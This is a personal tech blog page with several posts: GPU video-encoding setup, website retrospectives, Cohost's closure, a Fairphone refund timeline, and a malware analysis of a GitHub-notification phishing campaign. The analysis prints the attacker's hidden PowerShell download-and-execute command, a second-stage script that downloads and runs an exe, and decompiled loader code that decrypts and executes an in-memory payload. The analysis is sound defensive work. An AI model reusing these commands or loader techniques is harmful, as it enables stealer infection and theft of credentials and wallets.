Securing My Web Infrastructure

A few months ago, I very briefly mentioned that I've migrated all my web infrastructure off Cloudflare, as well as having built a custom web service to host it all. I call this new web service WebCentral, and I'd like to talk about some of the steps I've taken and lessons I've learned about how I secure my infrastructure.

Building a Threat Model

Before you can work to secure any service, you need to understand what your threat model is. This sounds more complicated than it really is; all you must do is consider what your risks are, how likely those risks are to be realized, and what the potential damage or impact of those risks could be. My websites don't store or process any user data, so I'm not terribly concerned about exfiltration; instead, my primary risks are unauthorized access to the server, exploitation of my code, and denial of service. Although the risks of denial of service are self-explanatory, the primary risk I see needing to protect against...
2 months ago


More from Ian's Blog

Hardware-Accelerated Video Encoding with Intel Arc on Redhat Linux

I've been wanting hardware-accelerated video encoding on my Linux machine for quite a while now, but ask anybody who's used a Linux machine and they'll tell you of the horrors of Nvidia or AMD drivers. Intel, on the other hand, seems to be taking things in a much different, much more positive direction when it comes to their Arc graphics cards. I've heard positive things from people who use them about the relatively painless driver experience, at least when compared to Nvidia. So I went out and grabbed a used Intel Arc A750 locally and installed it in my server running Rocky 9.4. This post documents what I did to install the required drivers and support libraries to be able to encode videos with ffmpeg utilizing the hardware of the GPU. This post is specific to Redhat Linux and all Redhat-compatible distros (Rocky, Oracle, etc.). If you're using any other distro, this post likely won't help you.

Driver Setup

The drivers for Intel Arc cards were added to the Linux kernel in version 6.2, but RHEL 9 uses kernel version 5.14. Thankfully, Intel provides a repo specific to RHEL 9 where they offer precompiled backports of the drivers against the stable kernel ABI of RHEL 9.

Add the Intel Repo

Add the following repo file to /etc/yum.repos.d. Note that I'm using RHEL 9.4 here. You will likely need to change 9.4 to whatever version you are using by looking in /etc/redhat-release. Update the baseurl value and ensure that URL exists.

    [intel-graphics-9.4-unified]
    name=Intel graphics 9.4 unified
    enabled=1
    gpgcheck=1
    baseurl=https://repositories.intel.com/gpu/rhel/9.4/unified/
    gpgkey=https://repositories.intel.com/gpu/intel-graphics.key

Run dnf clean all for good measure.

Install the Software

    dnf install intel-opencl \
        intel-media \
        intel-mediasdk \
        libmfxgen1 \
        libvpl2 \
        level-zero \
        intel-level-zero-gpu \
        mesa-dri-drivers \
        mesa-vulkan-drivers \
        mesa-vdpau-drivers \
        libdrm \
        mesa-libEGL \
        mesa-lib

Reboot your machine for good measure.

Verify Device Availability

You can verify that your GPU is seen using the following:

    clinfo | grep "Device Name"
        Device Name    Intel(R) Arc(TM) A750 Graphics
        Device Name    Intel(R) Arc(TM) A750 Graphics
        Device Name    Intel(R) Arc(TM) A750 Graphics
        Device Name    Intel(R) Arc(TM) A750 Graphics

ffmpeg Setup

Install ffmpeg

ffmpeg needs to be compiled with libvpl support. For simplicity's sake, you can use this pre-compiled static build of ffmpeg. Download the ffmpeg-master-latest-linux64-gpl.tar.xz binary.

Verify ffmpeg support

If you're going to use a different copy of ffmpeg, or compile it yourself, you'll want to verify that it has the required support using the following:

    ./ffmpeg -hide_banner -encoders | grep "qsv"
     V..... av1_qsv     AV1 (Intel Quick Sync Video acceleration) (codec av1)
     V..... h264_qsv    H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (Intel Quick Sync Video acceleration) (codec h264)
     V..... hevc_qsv    HEVC (Intel Quick Sync Video acceleration) (codec hevc)
     V..... mjpeg_qsv   MJPEG (Intel Quick Sync Video acceleration) (codec mjpeg)
     V..... mpeg2_qsv   MPEG-2 video (Intel Quick Sync Video acceleration) (codec mpeg2video)
     V..... vp9_qsv     VP9 video (Intel Quick Sync Video acceleration) (codec vp9)

If you don't have any qsv encoders, your copy of ffmpeg isn't built correctly.

Converting a Video

I'll be using this video from the Wikimedia Commons for reference, if you want to play along at home. This is a VP9-encoded video in a webm container. Let's re-encode it to H.264 in an MP4 container.
I'll skip doing any other transformations to the video for now, just to keep things simple.

    ./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv Sea_to_Sky_Highlights.mp4

The key parameter here is telling ffmpeg to use the h264_qsv encoder for the video, which is the hardware-accelerated codec. Let's see what kind of difference using hardware acceleration makes:

    Encoder               Time       Average FPS
    h264_qsv (Hardware)   3.02s      296
    libx264 (Software)    1m2.996s   162

Using hardware acceleration sped up this operation by 95%. Naturally your numbers won't be the same as mine, as there's lots of variables at play here, but I feel this is a good demonstration that this was a worthwhile investment.
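The command above leaves everything at the encoder's defaults. If you want to trade some speed for quality, the QSV encoders also accept ffmpeg's standard rate-control options; here's a minimal sketch, where -preset and -global_quality are real h264_qsv options but the specific values are just my own starting points, not settings from the original post:

    # Constant-quality (ICQ) encode on the GPU. Lower -global_quality means
    # higher quality and a larger file; slower presets improve compression.
    ./ffmpeg -i Sea_to_Sky_Highlights.webm \
        -c:v h264_qsv -preset veryslow -global_quality 24 \
        Sea_to_Sky_Highlights.mp4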

7 months ago 32 votes
Having a Website Used to Be Fun

According to the Wayback Machine, I launched my website over a decade ago, in 2013. Just that thought alone makes me feel old, but going back through the old snapshots of my websites gave me a profound feeling of longing for a time when having a website used to be a novel and enjoyable experience.

The Start

Although I no longer have the original invoice, I believe I purchased the ianspence.com domain in 2012 when I was studying web design at The Art Institute of Vancouver. Yes, you read that right, I went to art school. Not just any, mind you, but one that was so catastrophically corrupt and profit-focused that it imploded as I was studying there. But that's a story for another time. I obviously didn't have any real plan for what I wanted my website to be, or what I would use it for. I simply wanted a web property where I could play around with what I was learning in school and expand my knowledge of PHP. I hosted my earliest sites from a very used Dell Optiplex GX280 tower in my house on my residential internet. Although the early 2010s were a rough period of my life, having my very own website was something that I was proud of and deeply enjoyed. Somewhere along the way, all that enjoyment was lost. And you don't have to take my own word for it. Just compare my site from 2013 to the site from when I wrote this post in 2024.

Graphic Design was Never My Passion

2013's website has an animated carousel of my photography, bright colours, and way too many accordions. Everything was at 100% because I didn't care so much about the final product as much as I was just screwing around and having fun. 2024's website is, save for the single sample of my photography work, a resume. Boring, professional, sterile of anything resembling personality. Even though the style of my site became more and more muted over the years, I continued to work and build on my site, but what I worked on changed as my interests grew. In the very early 2010s I thought I wanted to go into web design, but after having suffered through 4 months of the most dysfunctional art school there is, I realized that maybe it was web development that interested me. That, eventually, grew into the networking and infrastructure training I went through, and the career I've built for myself.

Changing Interests

As my interests changed, my focus on the site became less about the design and appearance and more about what was serving the site itself. My site literally moved out of the basement suite I was living in and onto a VPS, running custom builds of PHP and Apache HTTPD. At one point, I even played around with load-balancing between my VPS and my home server, which had graduated into something much better than that old Dell. Or, at least until my internet provider blocked inbound port 80. This is right around when things stopped being fun anymore.

When Things Stopped Being Fun

Upon reflection, there were two big mistakes I made that stole all of the enjoyment out of tinkering with my websites: Cloudflare and scaling.

Cloudflare

A dear friend of mine (that one knows I'm referring to it) introduced me to Cloudflare sometime in 2014, which I believe was the poison pill that started my journey into taking the fun out of things for me. You see, Cloudflare is designed for big businesses or people with very high-traffic websites. Neither of which applied to me. I was just some dweeb who liked PHP. Cloudflare works by sitting between your website's hosting server and your visitors.
All traffic from your visitors flows through Cloudflare, where they can do their magic. When configured properly, the original web host is effectively hidden from the web, as people have to go through Cloudflare first. This, at least as far as this blog post is concerned, was the crux of my issues with Cloudflare. For example, before Let's Encrypt existed, Cloudflare did not allow TLS at all on their free plans. This was right at the time when I was just starting to learn about TLS, but because I had convinced myself that I had to use Cloudflare, I could never actually use it on my website. This specific problem of TLS never went away, either: even though Cloudflare now offers free TLS, they have total control over everything, and they have the final say in what is and isn't allowed. The problems weren't just TLS, of course, because if you wanted to handle non-HTTP traffic then you couldn't use Cloudflare's proxy. Once again, I ran into the same misguided fear that exposing my web server to the internet was a recipe for disaster.

Scaling (or lack thereof)

The other, larger, mistake I made was an obsession with scaling and security. Thanks to my education I had learned a lot about enterprise networking and systems administration, and I deigned to apply those skills to my own site. Aggressive caching, global CDNs, monitoring, automated deployments, telemetry, obsession over response times, and probably more I'm not remembering. All for a mostly static website for a dork that had maybe 5 page views a month. This is a mistake that I see people make all the time, and not just with websites: people think they need to be concerned about scaling problems without first asking whether those problems even apply, or will ever apply, to them. If I was able to host my website from an abused desktop tower with blown caps on cable internet just fine, then why in the world would I need to be obsessing over telemetry and response times? Sadly, things only got worse when I got into cybersecurity, because now on top of all the concerns with performance and scale, I was trying to protect myself from exceedingly unlikely threats. Up until embarrassingly recently, I was using complicated file integrity checks with hardware-backed cryptographic keys to ensure that only I could make changes to the content of my site. For some reason, I had built this threat model in my head where I needed to protect against malicious changes on an already well-protected server. All of this created an environment where making any change at all was a cumbersome and time-consuming task. Is it any wonder that I ended up making my site look like a resume, when making any change to it was so much work?

The Lesson I Learned

All of this retrospective started because of the death of Cohost, as many of the folks there (myself included) decided to move to posting on their own blogs. This gave me a great chance to see what some of my friends were doing with their sites, unlocking fond memories of back in 2012 and 2013 when I, too, was just having fun with my silly little website. All of this led me to the realization of the true root cause of my misery: in an attempt to mimic what enterprises do with their websites in terms of stability and security, I made it difficult to make any changes to my site. Realizing this, I began to unravel the design decisions I had made, and came up with a much better, simpler, and, most of all, enjoyable design.
How my Website Used to Work

The last design of my website before I came to the conclusions discussed above was as follows: My website was a packaged Docker container image which ran nginx. All of the configuration and static files were included in the image, so theoretically it could run anywhere. That image was run on Azure Container Instances, a managed container platform, with the image hosted on Azure Container Registry. Cloudflare sat in front of my website and proxied all connections to it. They took care of the domain registration, DNS, and TLS. Whenever I wanted to make changes to my site, I would create a container image, sign it using a private key on my YubiKey, and push that to GitHub. A GitHub action would then deploy that image to Azure Container Registry and trigger the container to restart, pulling the new image.

How my Website Works Now

Now that you've seen the most ridiculous design for some dork's personal website, let me show you how it works now: Yes, it's really that simple. My websites are now powered by a virtual machine with a public IP address. When users visit my website, they talk directly to that virtual machine. When I want to make changes to my website, I push them directly to that machine. TLS certificates are provided by Let's Encrypt. I still use Cloudflare as my domain registrar and DNS provider, but, crucially, nothing is proxied through Cloudflare. When you loaded this blog post, your browser talked directly to my server. It's virtually identical to the way I was doing things in 2013, and it's been invigorating to shed this excess weight and unnecessary complication. But there's actually a whole lot going on behind the scenes that I'm omitting from this diagram.

Static Websites Are Boring

A huge problem with my previous design is that I had locked myself into a purely static website, and static websites are boring! Websites are more fun when they can, you know, do things, and doing things with a static website usually depends on JavaScript running in the user's browser. That's lame. Let's take a really simple example: sometimes I want to show a banner at the top of my website. With a static-only site, unless you hard-code that banner into the HTML, you'd need JavaScript to ask some backend whether a banner should be displayed and, if so, render it. But on a dynamic page, where server-side rendering is used? This is trivially easy (a sketch follows at the end of this post). A key change with my new website is switching away from containers, which are ephemeral and immutable, to a virtual machine, which is neither, and going back to server-side rendering. I realized that a lot of the fun I was having back then was because PHP is server-side, and you can do a lot of wacky things when you have total control over the server! I'm really burying the lede here, but my new site is powered not by nginx, or httpd, but by my own web server, entirely custom and designed for tinkering and hacking. That, combined with no longer having to deal with Cloudflare, has given me total control to do whatever the hell I want. Maybe I'll do another post some day talking about this, but I've written enough about websites for one day.

Wrapping Up

That feeling of wanting to do whatever the hell I want really does sum up the sentiment I've come to over the past few weeks. This is my website. I should be able to do whatever I want with it, free from self-imposed judgement or concern over non-issues.
Kill the cop in your head that tells you to share the concerns that Google has. You're not Google. Websites should be fun. Enterprise tools like Cloudflare and managed containers aren't.
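To make the banner example from earlier concrete, here's a minimal sketch of that kind of server-side logic, written in the PHP of my early sites. The file names and markup are hypothetical, and my actual custom web server doesn't necessarily work this way; it's just the shape of the idea:

    <?php
    // banner.php - include()d at the top of every page template.
    // The server decides whether a banner exists; the browser just gets HTML.
    // No JavaScript, no API call from the client.
    $bannerFile = '/var/www/banner.txt'; // hypothetical location of the banner text
    if (is_readable($bannerFile)) {
        $message = trim(file_get_contents($bannerFile));
        if ($message !== '') {
            echo '<div class="banner">' . htmlspecialchars($message) . '</div>';
        }
    }

Showing or hiding the banner is then just creating or deleting a file on the server, which is exactly the kind of low-ceremony tinkering that made this fun in the first place.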

7 months ago 30 votes
GitHub Notification Emails Hijacked to Send Malware

As an open source developer I frequently get emails from GitHub. Most of these emails are notifications sent on behalf of GitHub users to let me know that somebody has interacted with something and requires my attention: perhaps somebody has created a new issue on one of my repos, or replied to a comment I left, or opened a pull request. Or perhaps the user is trying to impersonate GitHub security and trick me into downloading malware. If that last one sounds out of place, well, I have bad news for you: it's happened to me. Twice. In one day.

Let me break down how this attack works:

1. The attacker, using a throw-away GitHub account, creates an issue on any one of your public repos
2. The attacker quickly deletes the issue
3. You receive a notification email as the owner of the repo
4. You click the link in the email, thinking it's legitimate
5. You follow the instructions and infect your system with malware

Now, as a savvy computer-haver you might think that you'd never fall for such an attack, but let me show you all the clever tricks employed here, and how attackers have found a way to hijack GitHub's email system to send malicious emails directly to project maintainers. To start, let's look at the email message I got. In text form (link altered for your safety):

    Hey there!

    We have detected a security vulnerability in your repository. Please contact us at [https://]github-scanner[.]com to get more information on how to fix this issue.

    Best regards,
    Github Security Team

Had I not already told you that this email is a notification about a new GitHub issue being created on my repo, there would be virtually nothing to go on that would tell you that, because the majority of this email is controlled by the attacker. Everything highlighted in red is, in one way or another, something the attacker can control - meaning the text or content is what they want it to say. Unfortunately, the remaining parts of the email that aren't controlled by the attacker don't provide sufficient context to know what's actually going on. Nowhere does the email say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message. The attacker impersonates the "Github Security Team", and because this email is a legitimate email sent from GitHub, it passes most of the common phishing checks: the email is from GitHub, and the link in the email goes to where it says it does.

GitHub can improve these notification emails to reduce the effectiveness of this type of attack by providing more context about what action the email is for, reducing the amount of attacker-controlled content, and improving clarity about the sender of the email. I have contacted GitHub security (the real one, not the fake imposter one) and shared these emails with them, along with my concerns.

The Website

If you were to follow the link in that email, you'd find yourself on a page that appears to have a captcha on it. Captcha-gated sites are annoyingly common, thanks in part to services like Cloudflare, which offers automated challenges based on heuristics. All this to say: users might not find a page that immediately demands they prove they're human all that out of the ordinary. What is out of the ordinary is how the captcha works.
Normally you'd be clicking on a never-ending slideshow of sidewalks or motorcycles as you definitely don't help train AI, but instead this site asks you to take the very specific step of opening the Windows Run box and pasting in a command. Honestly, if solving captchas were actually this easy, I'd be down for it. Sadly, it's not real - so now let's take a look at the malware.

The Malware

The site put the following text in my clipboard (link modified for your safety):

    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

We'll consider this stage 1 of 4 of the attack. What this does is start a new Windows PowerShell process with the window hidden and run a command to download a script file and execute it. iex is a built-in alias for Invoke-Expression, and iwr is Invoke-WebRequest. For the Linux users out there, this is equivalent to calling curl | bash. The comment at the end of the command, combined with the limited width of the Windows Run box, effectively hides the first part of the command, so the user only sees this:

Between the first email I got and the time of writing, the URL in the script has changed, but the contents remain the same. Moving on to the second stage, the contents of the evaluated script file are (link modified for your safety):

    $webClient = New-Object System.Net.WebClient
    $url1 = "[https://]github-scanner[.]com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath $env:TEMP\SysSetup.exe

This script is refreshingly straightforward, with virtually no obfuscation. It downloads a file, l6E.exe, saves it as <User Home>\AppData\Local\Temp\SysSetup.exe, and then runs that file.

I first took a look at the exe itself in Windows Explorer and noticed that it had a digital signature. The certificate used appears to have come from Spotify, but importantly, the signature of the malicious binary is not valid - meaning it's likely just a spoofed signature that was copied from a legitimately-signed Spotify binary. The presence of this invalid codesigning signature is itself interesting, because it highlights two weaknesses in Windows that this malware exploits.

I would have assumed that Windows would warn you before it runs an exe with an invalid code signature, especially one downloaded from the internet, but it turns out that's not entirely the case. It's important to know how Windows determines if something was downloaded from the internet, and this is done through what is commonly called the "Mark of the Web" (or MOTW). In short, this is a small flag set in the metadata of a file that says it came from the internet. Browsers and other software can set this flag, and other software can look for that flag to alter their behaviour. A good example is how Office behaves with a file downloaded from the internet. If you were to download that l6E.exe file in your web browser (please don't!) and tried to open it, you'd be greeted with this hilariously aged dialog. Note that at the bottom Windows specifically highlights that this application does not have a valid signature. But this warning never appears for the victim, and it has to do with the Mark of the Web. Step back for a moment and you'll recall that it's not the browser that downloads this malicious exe; it's PowerShell - or, more specifically, the System.Net.WebClient class in .NET Framework.
This class has a method, DownloadFile, which does exactly that - downloads a file to a local path - except this method does not set the MOTW flag on the downloaded file. Take a look at this side-by-side comparison of the file downloaded using the same .NET API used by the malware on the left, and a browser on the right. This exposes the other weakness in Windows: Windows will only warn you when you try to run an exe with an invalid digital signature if that file has the Mark of the Web. It is unwise to rely on the Mark of the Web in any way, as it's trivially easy to remove that flag; had the .NET library set it, the attacker could have easily just removed it before starting the process. (A sketch of how to inspect the flag yourself follows at the end of this post.) Both of these weaknesses have been reported to Microsoft, but for us, we should stop getting distracted by code signing certificates and instead move on to looking at what this dang exe actually does.

I opened the exe in Ghidra and then realized that I know nothing about assembly or reverse engineering, but I did see mentions of .NET in the output, so I moved to dotPeek to see what I could find. There are two parts of the code that matter: the entrypoint and the PersonalActivation method. The entrypoint hides the console window, calls PersonalActivation twice in a background thread, marks a region of memory as executable with VirtualProtect, and then executes it with CallWindowProcW.

    private static void Main(string[] args)
    {
        Resolver resolver = new Resolver("Consulter", 100);
        Program.FreeConsole();
        double num = (double) Program.UAdhuyichgAUIshuiAuis();
        Task.Run((Action) (() =>
        {
            Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco);
            Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key);
        }));
        Thread.Sleep(1000);
        uint ASxcgtjy = 0;
        Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref ASxcgtjy);
        int index = 392;
        Program.CallWindowProcW(ref Program.AIOsncoiuuA[index], MoveAngles.userBuffer, 0, 0, 0);
    }

The PersonalActivation function takes in a list and two byte arrays. The list parameter is not used; the first byte array is a data buffer, and the second is labeled key. This, plus the amount of math they're doing, gives away that this is some form of decryptor, though I'm not good enough at math to figure out what algorithm it is. I commented out the two calls to VirtualProtect and CallWindowProcW, compiled the rest of the code, and ran it in a debugger so that I could examine the contents of the two decrypted buffers.

The first buffer contains a call to CreateProcess:

    00000000  55 05 00 00 37 13 00 00 00 00 00 00 75 73 65 72  U...7.......user
    00000010  33 32 2E 64 6C 6C 00 43 72 65 61 74 65 50 72 6F  32.dll.CreatePro
    00000020  63 65 73 73 41 00 56 69 72 74 75 61 6C 41 6C 6C  cessA.VirtualAll
    00000030  6F 63 00 47 65 74 54 68 72 65 61 64 43 6F 6E 74  oc.GetThreadCont
    00000040  65 78 74 00 52 65 61 64 50 72 6F 63 65 73 73 4D  ext.ReadProcessM
    00000050  65 6D 6F 72 79 00 56 69 72 74 75 61 6C 41 6C 6C  emory.VirtualAll
    00000060  6F 63 45 78 00 57 72 69 74 65 50 72 6F 63 65 73  ocEx.WriteProces
    00000070  73 4D 65 6D 6F 72 79 00 53 65 74 54 68 72 65 61  sMemory.SetThrea
    00000080  64 43 6F 6E 74 65 78 74 00 52 65 73 75 6D 65 54  dContext.ResumeT
    00000090  68 72 65 61 64 00 39 05 00 00 BC 04 00 00 00 00  hread.9...¼.....
    000000A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    000000B0  00 00 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73  ......C:\Windows
    000000C0  5C 4D 69 63 72 6F 73 6F 66 74 2E 4E 45 54 5C 46  \Microsoft.NET\F
    000000D0  72 61 6D 65 77 6F 72 6B 5C 76 34 2E 30 2E 33 30  ramework\v4.0.30
    000000E0  33 31 39 5C 52 65 67 41 73 6D 2E 65 78 65 00 37  319\RegAsm.exe.7
    [...]

And the second buffer - well, just take a look at the headers and you might see what's going on :)

    00000000  4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00  MZx.............
    00000010  00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
    00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00000030  00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00  ............x...
    00000040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..´.Í!¸.LÍ!Th
    00000050  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
    00000060  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
    00000070  6D 6F 64 65 2E 24 00 00 50 45 00 00 4C 01 04 00  mode.$..PE..L...

So now we know that the large byte arrays at the top of the code are an "encrypted" exe, which this loader decrypts into memory, marks as executable, and then executes. Marvelous. Sadly, this is where I hit a wall, as my skills at reverse engineering applications are very limited. The final stage of the attack is a Windows exe, but not one made with .NET, and I don't really know what I'm looking at in the output from Ghidra. Thankfully, however, actual professionals have already done the work for me! Naturally, I put both the first and second binaries into VirusTotal and found that they were already flagged by a number of AVs. A common pattern in the naming was "LUMMASTEALER", which gives us our hint as to what this malware is. Lumma is one of many malware operations (read: gangs) that offer a "malware as a service" product. Their so-called "stealer" code searches through your system for cryptocurrency wallets, stored credentials, and other sensitive data. This data is then sent to their command-and-control (C2) servers, where the gang can move on to either stealing money from you or profiting from selling your data online. Lumma's malware tends not to encrypt victims' devices the way traditional ransomware operations do. For more information, I recommend this excellent write-up from Cyfirma.

If you made it this far, thanks for reading! I had a lot of fun looking into the details of this attack, ranging from the weakness in GitHub's notification emails to the multiple layers of the attack. Some of the tools I used to help me do this analysis were:

Windows Sandbox
Ghidra
dotPeek
HxD
Visual Studio

Update: Previously I said that the codesigning certificate was stolen from Spotify; however, after discussing my findings with DigiCert, we agreed that this is not the case and that the signature is being spoofed.
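As promised above, here's a quick way to inspect the Mark of the Web yourself. These are standard PowerShell cmdlets; the file name is just a hypothetical stand-in for something you downloaded:

    # MOTW lives in an NTFS alternate data stream named "Zone.Identifier".
    # A browser-downloaded file will show something like:
    #   [ZoneTransfer]
    #   ZoneId=3        <- 3 means the Internet zone
    # A file fetched with System.Net.WebClient.DownloadFile has no such stream,
    # so this command would error out on it.
    Get-Content -Path .\some-download.exe -Stream Zone.Identifier

    # And this is why relying on MOTW is shaky: removing it is one cmdlet.
    Unblock-File -Path .\some-download.exe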

9 months ago 22 votes
Mourning the Loss of Cohost

The staff running Cohost have announced (archived) that at the end of 2024 Cohost will be shutting down, with the site going read-only on October 1st, 2024. This news was deeply upsetting to receive, as Cohost filled a space left by other social media websites when they stopped being fun and became nothing but tools of corporations.

Looking Back

I joined Cohost in October of 2022, when it was still unclear if elon musk would go through with his disastrous plan to buy twitter. The moment that deal was confirmed, I abandoned my Twitter account, switched to using Cohost exclusively, and never looked back once. I signed up for Cohost Plus! a week later after seeing the potential for what Cohost could become, and what it could mean for a less commercial future. I believed in Cohost. I believed that I could be witness to the birth of a better web, built not on advertising, corporate greed, and privacy invasion, but instead on a focus on people, the content they share, and the communities they build. The loss of Cohost is greater than just the loss of the community of friends I've made; it's the dark cloud that has now formed over the people who shared that vision, and the rise of the question of "why bother".

When I look back at my time on twitter, I'm faced with mixed feelings. I dearly miss the community that I had built there - some of us scattered to various places, while others decided to take their leave entirely from social media. I am sad knowing that, despite my best efforts to maintain the connections I've made, I will lose touch with my friends because there is no replacement for Cohost. Although I miss my friends from twitter, I've come to realize how awful twitter was for me and my well-being. It's funny to me that back when I was using twitter, I and seemingly everybody else knew that twitter was a bad place, and yet we all continued to use it. Even now, well into its nazi bar era, people continue to use it. Cohost showed what a social media site could be if the focus was not on engagement, but on the community. The lack of hard statistics like follower or like counts meant that Cohost could never be a popularity contest - and that is something that seemingly no other social media site has come to grips with.

The Alternatives

Many people are moving, or have already moved, to services like Mastodon and Bluesky. While I am on Mastodon, these services have severe flaws that make them awful as a replacement for Cohost. Mastodon is a difficult-to-understand web of protocols, services, terminology, and dogma. It suffers from a critical "open source brain worm", where libertarian ideals take priority over important safety and usability aspects, and I do not see any viable way to resolve these issues. Imagine trying to convince somebody who isn't technical to "join mastodon". How are they ever going to understand the concept of decentralization, or what an instance is, or who runs the instance, or what client to use, or even what "fediverse" means? This insurmountable barrier ensures that only specific people are taking part in the community, and excludes so many others. Bluesky is the worst of both worlds: technically decentralized, yet very corporate. It's a desperate attempt to clone twitter as much as possible, without stopping for even a moment to evaluate whether that includes copying some of twitter's worst mistakes.

Looking Forward

When it became clear that I was going to walk away from my twitter account, there was fear and anxiety.
I knew that I would lose connections, some of which I had to work hard to build, but I had to stick to my morals. In the end, things turned out alright. I found a tight-knit community of friends in a private Discord server, found more time to focus on my hobbies and less on doomscrolling, and established this very blog. I know that even though I am very sad and very angry about Cohost, things will turn out alright.

So long, Cohost, and thank you, Jae, Colin, Aiden, and Kara for trying. You are all an inspiration to not just desire a better world, but to go out and make an effort to build it. I'll miss you, eggbug.

9 months ago 18 votes

More in technology

My horrible Fairphone customer care experience

Fairphone has bad customer support. It's not an issue with the individual customer support agents (I know how difficult their job is[1], and I'm sure that they're trying their best), but a more systemic issue in the organization itself. It's become so bad that Fairphone issued an open letter to the Fairphone community forum acknowledging the issue and the steps they're taking to fix it. Until those fixes land, I only have my experience to go by.

I've contacted Fairphone customer support twice: once with a question about Fairphone 5 security updates not arriving in a timely manner, and another time with a request to refund the Fairphone Fairbuds XL under the 14-day return policy. In both cases, I received an initial reply over a month later. That's not catastrophic for a non-critical query, but when you have a technical issue with a product, it can become a huge inconvenience.

I recently gave the Fairbuds XL a try because the reviews for them online were decent and I want to support the Fairphone project, but I found the sound profile very underwhelming and the noise cancelling did not work adequately.[2] I decided to use the 14-day return policy that Fairphone advertise, which led to the worst customer care experience I've had so far.[3] Here's a complete timeline of the process of returning a set of headphones to the manufacturer for a refund.

2025-02-10: initial purchase of the headphones
2025-02-14: I receive the headphones and test them out, with disappointing results
2025-02-16: I file a support ticket with Fairphone indicating that I wish to return the headphones according to their 14-day return policy
2025-02-25: I ask again about the refund after not hearing back from Fairphone
2025-03-07: I receive an automated message apologizing for the delay and asking me not to open additional tickets on the matter, which I had not been doing
2025-04-01: I start the chargeback process for the payment through my bank, due to Fairphone support not replying for over a month
2025-04-29: Fairphone support finally responds with instructions on how to send back the device to receive a refund
2025-05-07: after acquiring packaging material and printing out three separate documents (UPS package card, invoice, Cordon Electronics sales voucher), I hand the headphones over to UPS
2025-05-15: I ask Fairphone about when the refund will be issued
2025-05-19 16:20 EEST: I receive a notice from Cordon Electronics confirming they have received the headphones
2025-05-19 17:50 EEST: I receive a notice from Cordon Electronics letting me know that they have started the process, whatever that means
2025-05-19 20:05 EEST: I receive a notice from Cordon Electronics saying that the repairs are done and they are now shipping the device back to me (!)
2025-05-19 20:14 EEST: I contact Fairphone support about this notice, asking for clarification
2025-05-19 20:24 EEST: I also send an e-mail to Cordon Electronics clarifying the situation and asking them not to send the device back to me, but to return it to Fairphone for a refund
2025-05-20 14:42 EEST: Cordon Electronics informs me that they have already shipped the device and cannot reverse the decision
2025-05-21: Fairphone support responds, saying that the device is being sent back due to a processing error, and that I should try to "refuse the order"
2025-05-22: I inform Fairphone support about the communication with Cordon Electronics
2025-05-27: Fairphone is aware of the chargeback I initiated and believes the refund has been issued; however, I have not yet received it
2025-05-27: I receive the headphones for the second time
2025-05-28: I inform Fairphone support about the current status of the headphones and the refund (still not received)
2025-05-28: Fairphone support recommends that I ask my bank about the status of the refund; I do so, but don't receive any useful information from them
2025-06-03: Fairphone support asks if I've received the refund yet
2025-06-04: I receive the refund through the dispute I raised with my bank, almost 4 months after the initial purchase took place
2025-06-06: Fairphone sends me instructions on how to send back the headphones for the second time
2025-06-12: I inform Fairphone that I have prepared the package and will post it next week due to limited access to a printer and the shipping company office
2025-06-16: I ship the device back to Fairphone again

There's an element of human error in the whole experience, but the initial lack of communication amplified my frustrations and contributed to my annoyances with my Fairphone 5 boiling over. And just like that, I've given up on Fairphone as a brand, and will be skeptical about buying any new products from them. I was what one would call a "brand evangelist" for them, sharing my good initial experiences with the phone with my friends, family, colleagues and the world at large, but bad experiences with customer care and the devices themselves have completely turned me off.

If you have interacted with Fairphone support after this post is live, then please share your experiences in the Fairphone community forum, or reach out to me directly (with proof). I would love to update this post after getting confirmation that Fairphone has fixed the issues with their customer care and addressed the major shortcomings in their products. I don't want to crap on Fairphone, I want them to do better. Repairability, sustainability and longevity still matter.

[1] I haven't worked as a customer care agent, but I have worked in retail, so I roughly know what level of communication the agents are treated with, often unfairly.
[2] That experience reminded me of how big of a role music plays in my life. I've grown accustomed to using good-sounding headphones, and I immediately noticed all the little details missing in my favourite music.
[3] Until this point, the worst experience I had was with Elisa Eesti AS, a major ISP in Estonia. I wanted to use my own router-modem box that was identical to the rented one from the ISP, and that only got resolved 1.5 months later, after I expressed intent to switch providers. Competition matters!

yesterday 5 votes
Comics from 1977/07 Issue of ROM

Only two, so read them slowly

5 days ago 8 votes
Build your own 4DOF robotic arm on a budget

Robot arms are very cool and can be quite useful, but they also tend to be expensive. That isn't just markup either, because the components themselves are pricey. However, you can save a lot of money if you make some sacrifices and build everything yourself. In that case, you can follow Ruben Sanchez's tutorial to […]

5 days ago 6 votes
Tandy Corporation, Part 3

Becoming IBM Compatible

a week ago 9 votes
There's not much point in buying Commodore

Bona fides: Commodore 128DCR on my desk with a second 1571, Ultimate II+-L and a ZoomFloppy, three SX-64s I use for various projects, heaps of spare 128DCRs, breadbox 64s, 16s, Plus/4s and VIC-20s on standby, multiple Commodore collectables (blue-label PET 2001, C64GS, 116, TV Games, 1551, 1570), a couple of A500s, an A3000 and an AmigaOS 3.9 QuikPak A4000T with '060 CPU, Picasso IV RTG card and Ethernet. I wrote for COMPUTE!'s Gazette (during the General Media years) and Loadstar. Here's me with Jack Tramiel and his son Leonard from a Computer History Museum event in 2007. It's on my wall.

